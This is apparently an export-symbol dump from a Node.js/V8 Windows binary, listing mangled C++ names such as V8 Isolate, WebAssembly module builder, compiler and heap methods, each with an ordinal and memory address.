                                                                                                                                                                                                                                    ?AddContext@SnapshotCreator@v8@@QEAA_KV?$Local@VContext@v8@@@2@USerializeInternalFieldsCallback@2@@Z29190x140c78170
                                                                                                                                                                                                                                    ?AddCrashKey@Isolate@internal@v8@@QEAAXW4CrashKeyId@3@AEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z29200x14053caa0
                                                                                                                                                                                                                                    ?AddCrashKeysForIsolateAndHeapPointers@Isolate@internal@v8@@AEAAXXZ29210x140b63f80
                                                                                                                                                                                                                                    ?AddCreateClosureSlot@FeedbackVectorSpec@internal@v8@@QEAAHXZ29220x14053cac0
                                                                                                                                                                                                                                    ?AddCurrentStack@ProfilerEventsProcessor@internal@v8@@QEAAX_N@Z29230x14087ad50
                                                                                                                                                                                                                                    ?AddData@SnapshotCreator@v8@@AEAA_KV?$Local@VContext@v8@@@2@_K@Z29240x140c78250
                                                                                                                                                                                                                                    ?AddData@SnapshotCreator@v8@@AEAA_K_K@Z29250x140c783f0
                                                                                                                                                                                                                                    ?AddDataElement@JSObject@internal@v8@@SA?AV?$Maybe@_N@3@V?$Handle@VJSObject@internal@v8@@@23@IV?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z29260x14095ab40
                                                                                                                                                                                                                                    ?AddDataSegment@WasmModuleBuilder@wasm@internal@v8@@QEAAXPEBEII@Z29270x140633d40
                                                                                                                                                                                                                                    ?AddDecorator@Graph@compiler@internal@v8@@QEAAXPEAVGraphDecorator@234@@Z29280x1410c8570
                                                                                                                                                                                                                                    ?AddDecorator@NodeOriginTable@compiler@internal@v8@@QEAAXXZ29290x1410f4910
                                                                                                                                                                                                                                    ?AddDecorator@SourcePositionTable@compiler@internal@v8@@QEAAXXZ29300x1410dd2e0
                                                                                                                                                                                                                                    ?AddDeferredReference@WebSnapshotDeserializer@internal@v8@@AEAA?AVHeapObject@23@V?$Handle@VHeapObject@internal@v8@@@23@IW4ValueType@WebSnapshotSerializerDeserializer@23@I@Z29310x1407af2a0
                                                                                                                                                                                                                                    ?AddDefineKeyedOwnICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29320x14053cad0
                                                                                                                                                                                                                                    ?AddDefineKeyedOwnPropertyInLiteralICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29330x14053caf0
                                                                                                                                                                                                                                    ?AddDefineNamedOwnICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29340x14053cb10
                                                                                                                                                                                                                                    ?AddDeoptStack@ProfilerEventsProcessor@internal@v8@@QEAAX_KH@Z29350x14087ae90
                                                                                                                                                                                                                                    ?AddDeoptimizationEntry@InstructionSequence@compiler@internal@v8@@QEAAHPEAVFrameStateDescriptor@234@W4DeoptimizeKind@34@W4DeoptimizeReason@34@IAEBUFeedbackSource@234@@Z29360x1410319f0
                                                                                                                                                                                                                                    ?AddDeoptimizationExit@CodeGenerator@compiler@internal@v8@@AEAAPEAVDeoptimizationExit@234@PEAVInstruction@234@_K1@Z29370x14106b020
                                                                                                                                                                                                                                    ?AddDeoptimize@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z29380x141067fa0
                                                                                                                                                                                                                                    ?AddDeserializedCode@NativeModule@wasm@internal@v8@@QEAA?AV?$unique_ptr@VWasmCode@wasm@internal@v8@@U?$default_delete@VWasmCode@wasm@internal@v8@@@std@@@std@@HV?$Vector@E@base@4@HIHHHHHV?$Vector@$$CBE@84@11W4Kind@WasmCode@234@W4ExecutionTier@234@@Z29390x14065f1d0
                                                                                                                                                                                                                                    ?AddDetachedContext@Isolate@internal@v8@@QEAAXV?$Handle@VContext@internal@v8@@@23@@Z29400x140b64160
                                                                                                                                                                                                                                    ?AddDispatchTable@WasmTableObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@H@Z29410x140623730
                                                                                                                                                                                                                                    ?AddElementSegment@WasmModuleBuilder@wasm@internal@v8@@QEAAXVWasmElemSegment@1234@@Z29420x140633df0
                                                                                                                                                                                                                                    ?AddEmbeddedObject@AssemblerBase@internal@v8@@IEAA_KV?$Handle@VHeapObject@internal@v8@@@23@@Z29430x140c0ef30
                                                                                                                                                                                                                                    ?AddEntry@?$ObjectHashTableBase@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAAXVInternalIndex@23@VObject@23@1@Z29440x140907160
                                                                                                                                                                                                                                    ?AddEntry@?$ObjectHashTableBase@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@IEAAXVInternalIndex@23@VObject@23@1@Z29450x1409071c0
                                                                                                                                                                                                                                    ?AddEntry@SourcePositionTableBuilder@internal@v8@@AEAAXAEBUPositionTableEntry@23@@Z29460x140bdbd40
                                                                                                                                                                                                                                    ?AddEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VHeapObject@23@@Z29470x14086b2f0
                                                                                                                                                                                                                                    ?AddEntry@V8HeapExplorer@internal@v8@@AEAAPEAVHeapEntry@23@VHeapObject@23@W4Type@423@PEBD@Z29480x14086b7f0
                                                                                                                                                                                                                                    ?AddEntry@V8HeapExplorer@internal@v8@@QEAAPEAVHeapEntry@23@_KW4Type@423@PEBD0@Z29490x14086b860
                                                                                                                                                                                                                                    ?AddEnvironmentCleanupHook@node@@YAXPEAVIsolate@v8@@P6AXPEAX@Z1@Z29500x14029b340
                                                                                                                                                                                                                                    ?AddEnvironmentCleanupHookInternal@node@@YAPEAUACHHandle@1@PEAVIsolate@v8@@P6AXPEAXP6AX1@Z1@Z1@Z29510x14029b3c0
                                                                                                                                                                                                                                    ?AddException@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z29520x140633ea0
                                                                                                                                                                                                                                    ?AddExport@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@base@4@PEAVWasmFunctionBuilder@234@@Z29530x140633ef0
                                                                                                                                                                                                                                    ?AddExport@WasmModuleBuilder@wasm@internal@v8@@QEAAXV?$Vector@$$CBD@base@4@W4ImportExportKindCode@234@I@Z29540x140633f50
                                                                                                                                                                                                                                    ?AddExportedGlobal@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@_NVWasmInitExpr@234@V?$Vector@$$CBD@base@4@@Z29550x140633fa0
                                                                                                                                                                                                                                    ?AddForInSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29560x14053cb30
                                                                                                                                                                                                                                    ?AddForTesting@LazilyGeneratedNames@wasm@internal@v8@@QEAAXHVWireBytesRef@234@@Z29570x14062d4d0
                                                                                                                                                                                                                                    ?AddFormalParameter@Parser@internal@v8@@AEAAXPEAUParserFormalParameters@23@PEAVExpression@23@1H_N@Z29580x14088d110
                                                                                                                                                                                                                                    ?AddFreshPage@NewSpace@internal@v8@@QEAA_NXZ29590x140ab7500
                                                                                                                                                                                                                                    ?AddFreshPageSynchronized@NewSpace@internal@v8@@QEAA_NXZ29600x140ab7630
                                                                                                                                                                                                                                    ?AddFunction@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAVWasmFunctionBuilder@234@I@Z29610x140634030
                                                                                                                                                                                                                                    ?AddFunction@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAVWasmFunctionBuilder@234@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@@Z29620x1406340e0
                                                                                                                                                                                                                                    ?AddFunctionForNameInference@Parser@internal@v8@@AEAAXPEAVFunctionLiteral@23@@Z29630x14088d1e0
                                                                                                                                                                                                                                    ?AddGCEpilogueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@@Z1@Z29640x140c78570
                                                                                                                                                                                                                                    ?AddGCEpilogueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@PEAX@Z31@Z29650x140c78590
                                                                                                                                                                                                                                    ?AddGCEpilogueCallback@LocalHeap@internal@v8@@QEAAXP6AXPEAX@Z0@Z29660x140af1ab0
                                                                                                                                                                                                                                    ?AddGCPrologueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@@Z1@Z29670x140c785b0
                                                                                                                                                                                                                                    ?AddGCPrologueCallback@Isolate@v8@@QEAAXP6AXPEAV12@W4GCType@2@W4GCCallbackFlags@2@PEAX@Z31@Z29680x140c785d0
                                                                                                                                                                                                                                    ?AddGlobal@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@_NVWasmInitExpr@234@@Z29690x1406341a0
                                                                                                                                                                                                                                    ?AddGlobalImport@WasmModuleBuilder@wasm@internal@v8@@QEAAIV?$Vector@$$CBD@base@4@VValueType@234@_N0@Z29700x140634260
                                                                                                                                                                                                                                    ?AddGoto@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@0@Z29710x141068030
                                                                                                                                                                                                                                    ?AddHeapObjectAllocationTracker@Heap@internal@v8@@QEAAXPEAVHeapObjectAllocationTracker@23@@Z29720x140afe9b0
                                                                                                                                                                                                                                    ?AddImmediate@InstructionSequence@compiler@internal@v8@@QEAA?AVImmediateOperand@234@AEBVConstant@234@@Z29730x14057e520
                                                                                                                                                                                                                                    ?AddImport@WasmModuleBuilder@wasm@internal@v8@@QEAAIV?$Vector@$$CBD@base@4@PEAV?$Signature@VValueType@wasm@internal@v8@@@34@0@Z29740x140634320
                                                                                                                                                                                                                                    ?AddIncrementalMarkingStep@GCTracer@internal@v8@@QEAAXN_K@Z29750x140b19fc0
                                                                                                                                                                                                                                    ?AddIncrementalSweepingStep@GCTracer@internal@v8@@QEAAXN@Z29760x140b19ff0
                                                                                                                                                                                                                                    ?AddInlineReducer@GraphAssembler@compiler@internal@v8@@QEAAXPEAVReducer@234@@Z29770x141071ba0
                                                                                                                                                                                                                                    ?AddInlinedFunction@OptimizedCompilationInfo@internal@v8@@QEAAHV?$Handle@VSharedFunctionInfo@internal@v8@@@23@V?$Handle@VBytecodeArray@internal@v8@@@23@VSourcePosition@23@@Z29780x140be0670
                                                                                                                                                                                                                                    ?AddInnerScope@Scope@internal@v8@@AEAAXPEAV123@@Z29790x1407fe940
                                                                                                                                                                                                                                    ?AddInputsToFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVFrameStateDescriptor@234@VFrameState@234@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@W4FrameStateInputKind@234@PEAVZone@34@@Z29800x14105b780
                                                                                                                                                                                                                                    ?AddInputsToFrameStateDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVStateValueList@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAVNode@234@W4FrameStateInputKind@234@PEAVZone@34@@Z29810x14105baa0
                                                                                                                                                                                                                                    ?AddInstance@WasmMemoryObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VWasmMemoryObject@internal@v8@@@23@V?$Handle@VWasmInstanceObject@internal@v8@@@23@@Z29820x140623870
                                                                                                                                                                                                                                    ?AddInstanceOfSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29830x14053cb50
                                                                                                                                                                                                                                    ?AddInstruction@InstructionScheduler@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z29840x1410dc870
                                                                                                                                                                                                                                    ?AddInstruction@InstructionSelector@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z29850x14105be30
                                                                                                                                                                                                                                    ?AddInstruction@InstructionSequence@compiler@internal@v8@@QEAAHPEAVInstruction@234@@Z29860x141031a40
                                                                                                                                                                                                                                    ?AddInternal@SwissNameDictionary@internal@v8@@AEAAHVName@23@VObject@23@VPropertyDetails@23@@Z29870x14053cb70
                                                                                                                                                                                                                                    ?AddIsolate@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z29880x14064a880
                                                                                                                                                                                                                                    ?AddJumpTable@CodeGenerator@compiler@internal@v8@@AEAAPEAVLabel@34@PEAPEAV534@_K@Z29890x14106b050
                                                                                                                                                                                                                                    ?AddKeyedHasICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29900x14053cc40
                                                                                                                                                                                                                                    ?AddKeyedLoadICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ29910x14053cc60
                                                                                                                                                                                                                                    ?AddKeyedStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z29920x14053cc80
                                                                                                                                                                                                                                    ?AddLiftoffBailout@NativeModule@wasm@internal@v8@@QEAAXXZ29930x14053ccb0
                                                                                                                                                                                                                                    ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@AEBUnapi_module@@@Z29940x14029d600
                                                                                                                                                                                                                                    ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@AEBUnode_module@1@@Z29950x14029d650
                                                                                                                                                                                                                                    ?AddLinkedBinding@node@@YAXPEAVEnvironment@1@PEBDP6AXV?$Local@VObject@v8@@@v8@@V?$Local@VValue@v8@@@4@V?$Local@VContext@v8@@@4@PEAX@Z5@Z29960x14029d760
                                                                                                                                                                                                                                    ?AddList@BytecodeLoopAssignments@compiler@internal@v8@@QEAAXVRegister@interpreter@34@I@Z29970x1412471e0
                                                                                                                                                                                                                                    ?AddLiteralChar@Scanner@internal@v8@@AEAAXD@Z29980x14053ccc0
                                                                                                                                                                                                                                    ?AddLiteralChar@Scanner@internal@v8@@AEAAXI@Z29990x14053cd00
                                                                                                                                                                                                                                    ?AddLiteralCharAdvance@Scanner@internal@v8@@AEAAXXZ30000x14053cd70
                                                                                                                                                                                                                                    ?AddLiteralSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ30010x14053cdf0
                                                                                                                                                                                                                                    ?AddLoadGlobalICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4TypeofMode@23@@Z30020x14053ce10
                                                                                                                                                                                                                                    ?AddLoadICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ30030x14053ce40
                                                                                                                                                                                                                                    ?AddLocal@DeclarationScope@internal@v8@@QEAAXPEAVVariable@23@@Z30040x140c62940
                                                                                                                                                                                                                                    ?AddLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAIVValueType@234@@Z30050x1406343e0
                                                                                                                                                                                                                                    ?AddLocals@LocalDeclEncoder@wasm@internal@v8@@QEAAIIVValueType@234@@Z30060x14069a4b0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBU?$GarbageCollectionBatchedEvents@UGarbageCollectionFullMainThreadIncrementalMark@metrics@v8@@@23@VContextId@123@@Z30070x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBU?$GarbageCollectionBatchedEvents@UGarbageCollectionFullMainThreadIncrementalSweep@metrics@v8@@@23@VContextId@123@@Z30080x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionFullCycle@23@VContextId@123@@Z30090x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionFullMainThreadIncrementalMark@23@VContextId@123@@Z30100x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionFullMainThreadIncrementalSweep@23@VContextId@123@@Z30110x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUGarbageCollectionYoungCycle@23@VContextId@123@@Z30120x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModuleCompiled@23@VContextId@123@@Z30130x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModuleDecoded@23@VContextId@123@@Z30140x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModuleInstantiated@23@VContextId@123@@Z30150x1400971a0
                                                                                                                                                                                                                                    ?AddMainThreadEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModuleTieredUp@23@VContextId@123@@Z30160x1400971a0
                                                                                                                                                                                                                                    ?AddMessageListener@Isolate@v8@@QEAA_NP6AXV?$Local@VMessage@v8@@@2@V?$Local@VValue@v8@@@2@@Z1@Z30170x140c785f0
                                                                                                                                                                                                                                    ?AddMessageListenerWithErrorLevel@Isolate@v8@@QEAA_NP6AXV?$Local@VMessage@v8@@@2@V?$Local@VValue@v8@@@2@@ZH1@Z30180x140c78600
                                                                                                                                                                                                                                    ?AddMicrotasksCompletedCallback@Isolate@v8@@QEAAXP6AXPEAV12@PEAX@Z1@Z30190x140c78730
                                                                                                                                                                                                                                    ?AddMicrotasksCompletedCallback@MicrotaskQueue@internal@v8@@UEAAXP6AXPEAVIsolate@3@PEAX@Z1@Z30200x140b59ec0
                                                                                                                                                                                                                                    ?AddMissingTransitions@Map@internal@v8@@CA?AV?$Handle@VMap@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VDescriptorArray@internal@v8@@@23@@Z30210x1409260f0
                                                                                                                                                                                                                                    ?AddMove@ParallelMove@compiler@internal@v8@@QEAAPEAVMoveOperands@234@AEBVInstructionOperand@234@0@Z30220x14057e5f0
                                                                                                                                                                                                                                    ?AddMove@ParallelMove@compiler@internal@v8@@QEAAPEAVMoveOperands@234@AEBVInstructionOperand@234@0PEAVZone@34@@Z30230x14057e600
                                                                                                                                                                                                                                    ?AddNearHeapLimitCallback@Heap@internal@v8@@QEAAXP6A_KPEAX_K1@Z0@Z30240x140afea30
                                                                                                                                                                                                                                    ?AddNearHeapLimitCallback@Isolate@v8@@QEAAXP6A_KPEAX_K1@Z0@Z30250x140c78740
                                                                                                                                                                                                                                    ?AddNode@BasicBlock@compiler@internal@v8@@QEAAXPEAVNode@234@@Z30260x14057e6f0
                                                                                                                                                                                                                                    ?AddNode@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z30270x1410e1300
                                                                                                                                                                                                                                    ?AddNode@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEBVOperator@234@@Z30280x1410a61e0
                                                                                                                                                                                                                                    ?AddNode@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEBVOperator@234@HPEBQEAV5234@@Z30290x141218100
                                                                                                                                                                                                                                    ?AddNode@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z30300x1410680a0
                                                                                                                                                                                                                                    ?AddOperandToStateValueDescriptor@InstructionSelector@compiler@internal@v8@@AEAA_KPEAVStateValueList@234@PEAV?$ZoneVector@VInstructionOperand@compiler@internal@v8@@@34@PEAVOperandGenerator@234@PEAVStateObjectDeduplicator@234@PEAVNode@234@VMachineType@34@W4FrameStateInputKind@234@PEAVZone@34@@Z30310x14105be90
                                                                                                                                                                                                                                    ?AddOptimizedCode@NativeContext@internal@v8@@QEAAXVCode@23@@Z30320x1409f4f50
                                                                                                                                                                                                                                    ?AddOrDisposeString@StringsStorage@internal@v8@@AEAAPEBDPEADH@Z30330x14085e400
                                                                                                                                                                                                                                    ?AddOutputToSelectContinuation@InstructionSelector@compiler@internal@v8@@AEAAXPEAVOperandGenerator@234@HPEAVNode@234@@Z30340x1405848e0
                                                                                                                                                                                                                                    ?AddOverload@AsmOverloadedFunctionType@wasm@internal@v8@@QEAAXPEAVAsmType@234@@Z30350x14072f3b0
                                                                                                                                                                                                                                    ?AddPage@BaseSpace@internal@cppgc@@QEAAXPEAVBasePage@23@@Z30360x140519f50
                                                                                                                                                                                                                                    ?AddPage@LargeObjectSpace@internal@v8@@UEAAXPEAVLargePage@23@_K@Z30370x140af2ff0
                                                                                                                                                                                                                                    ?AddPage@PagedSpace@internal@v8@@QEAA_KPEAVPage@23@@Z30380x140aac320
                                                                                                                                                                                                                                    ?AddParkedAllocationBuffer@NewSpace@internal@v8@@QEAA_NHW4AllocationAlignment@23@@Z30390x140ab7670
                                                                                                                                                                                                                                    ?AddPathFromEnd@ProfileTree@internal@v8@@QEAAPEAVProfileNode@23@AEBV?$vector@PEAVCodeEntry@internal@v8@@V?$allocator@PEAVCodeEntry@internal@v8@@@std@@@std@@H_N@Z30400x140865a90
                                                                                                                                                                                                                                    ?AddPathFromEnd@ProfileTree@internal@v8@@QEAAPEAVProfileNode@23@AEBV?$vector@UCodeEntryAndLineNumber@internal@v8@@V?$allocator@UCodeEntryAndLineNumber@internal@v8@@@std@@@std@@H_NW4CpuProfilingMode@3@@Z30410x140865b40
                                                                                                                                                                                                                                    ?AddPathToCurrentProfiles@CpuProfilesCollection@internal@v8@@QEAAXVTimeTicks@base@3@AEBV?$vector@UCodeEntryAndLineNumber@internal@v8@@V?$allocator@UCodeEntryAndLineNumber@internal@v8@@@std@@@std@@H_NVTimeDelta@53@W4StateTag@3@W4EmbedderStateTag@3@_K6@Z30420x140865c30
                                                                                                                                                                                                                                    ?AddPhi@InstructionBlock@compiler@internal@v8@@QEAAXPEAVPhiInstruction@234@@Z30430x14057e6f0
                                                                                                                                                                                                                                    ?AddPosition@SourcePositionTableBuilder@internal@v8@@QEAAX_KVSourcePosition@23@_N@Z30440x140bdbe40
                                                                                                                                                                                                                                    ?AddPotentiallyDeadCode@WasmEngine@wasm@internal@v8@@QEAA_NPEAVWasmCode@234@@Z30450x14064a930
                                                                                                                                                                                                                                    ?AddPredecessor@BasicBlock@compiler@internal@v8@@QEAAXPEAV1234@@Z30460x141068230
                                                                                                                                                                                                                                    ?AddProperty@JSObject@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VJSObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z30470x14095b280
                                                                                                                                                                                                                                    ?AddProtectedInstructionLanding@CodeGenerator@compiler@internal@v8@@QEAAXII@Z30480x14106b0f0
                                                                                                                                                                                                                                    ?AddRange@AddressToTraceMap@internal@v8@@QEAAX_KHI@Z30490x14087d460
                                                                                                                                                                                                                                    ?AddRangeToActiveSystemPages@PagedSpace@internal@v8@@QEAAXPEAVPage@23@_K1@Z30500x140aac4a0
                                                                                                                                                                                                                                    ?AddRanger@OperationTyper@compiler@internal@v8@@AEAA?AVType@234@NNNN@Z30510x141249910
                                                                                                                                                                                                                                    ?AddRawLiteralChar@Scanner@internal@v8@@AEAAXI@Z30520x14053ce60
                                                                                                                                                                                                                                    ?AddRecursiveGroup@TypeCanonicalizer@wasm@internal@v8@@QEAAXPEAUWasmModule@234@I@Z30530x1406d6190
                                                                                                                                                                                                                                    ?AddReducer@GraphReducer@compiler@internal@v8@@QEAAXPEAVReducer@234@@Z30540x1410c8570
                                                                                                                                                                                                                                    ?AddRef@CodeEntryStorage@internal@v8@@QEAAXPEAVCodeEntry@23@@Z30550x140865df0
                                                                                                                                                                                                                                    ?AddRef@WasmCodeRefScope@wasm@internal@v8@@SAXPEAVWasmCode@234@@Z30560x14065f3b0
                                                                                                                                                                                                                                    ?AddResumeTarget@LoopInfo@compiler@internal@v8@@QEAAXAEBVResumeJumpTarget@234@@Z30570x14111ad40
                                                                                                                                                                                                                                    ?AddRetainedMap@Heap@internal@v8@@QEAAXV?$Handle@VNativeContext@internal@v8@@@23@V?$Handle@VMap@internal@v8@@@23@@Z30580x140afeae0
                                                                                                                                                                                                                                    ?AddReturn@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z30590x141068250
                                                                                                                                                                                                                                    ?AddReturningUnusedBounds@FreeList@internal@cppgc@@QEAA?AU?$pair@PEAEPEAE@std@@UBlock@123@@Z30600x14051c930
                                                                                                                                                                                                                                    ?AddSample@ProfilerEventsProcessor@internal@v8@@QEAAXUTickSample@23@@Z30610x14087afc0
                                                                                                                                                                                                                                    ?AddScheduledBytesToMark@IncrementalMarking@internal@v8@@AEAAX_K@Z30620x140af5290
                                                                                                                                                                                                                                    ?AddScopeSample@GCTracer@internal@v8@@QEAAXW4ScopeId@Scope@123@N@Z30630x140a981d0
                                                                                                                                                                                                                                    ?AddSharedWasmMemory@Isolate@internal@v8@@QEAAXV?$Handle@VWasmMemoryObject@internal@v8@@@23@@Z30640x140b64250
                                                                                                                                                                                                                                    ?AddSignature@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEBV?$Signature@VValueType@wasm@internal@v8@@@34@I@Z30650x140634400
                                                                                                                                                                                                                                    ?AddSlot@FeedbackVectorSpec@internal@v8@@AEAA?AVFeedbackSlot@23@W4FeedbackSlotKind@23@@Z30660x1409a8e70
                                                                                                                                                                                                                                    ?AddSlot@OldToNewRememberedSet@internal@cppgc@@QEAAXPEAX@Z30670x14050a360
                                                                                                                                                                                                                                    ?AddSourceObject@OldToNewRememberedSet@internal@cppgc@@QEAAXAEAVHeapObjectHeader@23@@Z30680x14050a430
                                                                                                                                                                                                                                    ?AddStoreGlobalICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z30690x14053ced0
                                                                                                                                                                                                                                    ?AddStoreICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@W4LanguageMode@23@@Z30700x14053cf00
                                                                                                                                                                                                                                    ?AddStoreInArrayLiteralICSlot@FeedbackVectorSpec@internal@v8@@QEAA?AVFeedbackSlot@23@XZ30710x14053cf30
                                                                                                                                                                                                                                    ?AddStructType@WasmModuleBuilder@wasm@internal@v8@@QEAAIPEAVStructType@234@I@Z30720x1406344b0
                                                                                                                                                                                                                                    ?AddSuccessor@BasicBlock@compiler@internal@v8@@QEAAXPEAV1234@@Z30730x1410682e0
                                                                                                                                                                                                                                    ?AddSuccessor@Schedule@compiler@internal@v8@@AEAAXPEAVBasicBlock@234@0@Z30740x141068300
                                                                                                                                                                                                                                    ?AddSuccessorForTesting@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@0@Z30750x140584960
                                                                                                                                                                                                                                    ?AddSurvivalRatio@GCTracer@internal@v8@@QEAAXN@Z30760x140b1a000
                                                                                                                                                                                                                                    ?AddSwitch@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@PEAPEAV5234@_K@Z30770x141068350
                                                                                                                                                                                                                                    ?AddTable@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@I@Z30780x140634510
                                                                                                                                                                                                                                    ?AddTable@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@II@Z30790x1406345d0
                                                                                                                                                                                                                                    ?AddTable@WasmModuleBuilder@wasm@internal@v8@@QEAAIVValueType@234@IIVWasmInitExpr@234@@Z30800x140634690
                                                                                                                                                                                                                                    ?AddTailCall@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z30810x141068440
                                                                                                                                                                                                                                    ?AddTemplateExpression@Parser@internal@v8@@AEAAXPEAPEAVTemplateLiteral@123@PEAVExpression@23@@Z30820x1408b9a50
                                                                                                                                                                                                                                    ?AddTemplateSpan@Parser@internal@v8@@AEAAXPEAPEAVTemplateLiteral@123@_N1@Z30830x1408b9ab0
                                                                                                                                                                                                                                    ?AddTerminator@InstructionScheduler@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z30840x1410dce70
                                                                                                                                                                                                                                    ?AddTerminator@InstructionSelector@compiler@internal@v8@@QEAAXPEAVInstruction@234@@Z30850x14105c210
                                                                                                                                                                                                                                    ?AddThreadSafeEvent@Recorder@metrics@v8@@UEAAXAEBUWasmModulesPerIsolate@23@@Z30860x1400971a0
                                                                                                                                                                                                                                    ?AddThrow@Schedule@compiler@internal@v8@@QEAAXPEAVBasicBlock@234@PEAVNode@234@@Z30870x1410684d0
                                                                                                                                                                                                                                    ?AddTimedSample@TimedHistogram@internal@v8@@QEAAXVTimeDelta@base@3@@Z30880x140a1d1a0
                                                                                                                                                                                                                                    ?AddToEnd@WeakArrayList@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@AEBVMaybeObjectHandle@23@2@Z30890x140907220
                                                                                                                                                                                                                                    ?AddToEnd@WeakArrayList@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@AEBVMaybeObjectHandle@23@@Z30900x140907490
                                                                                                                                                                                                                                    ?AddToEquivalenceSet@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAXPEAVRegisterInfo@1234@0@Z30910x140a37ce0
                                                                                                                                                                                                                                    ?AddToScriptList@Factory@internal@v8@@AEAAXV?$Handle@VScript@internal@v8@@@23@@Z30920x140b204e0
                                                                                                                                                                                                                                    ?AddToScriptList@LocalFactory@internal@v8@@AEAAXV?$Handle@VScript@internal@v8@@@23@@Z30930x1400971a0
                                                                                                                                                                                                                                    ?AddToUnion@Type@compiler@internal@v8@@CAHV1234@PEAVUnionType@234@HPEAVZone@34@@Z30940x141027260
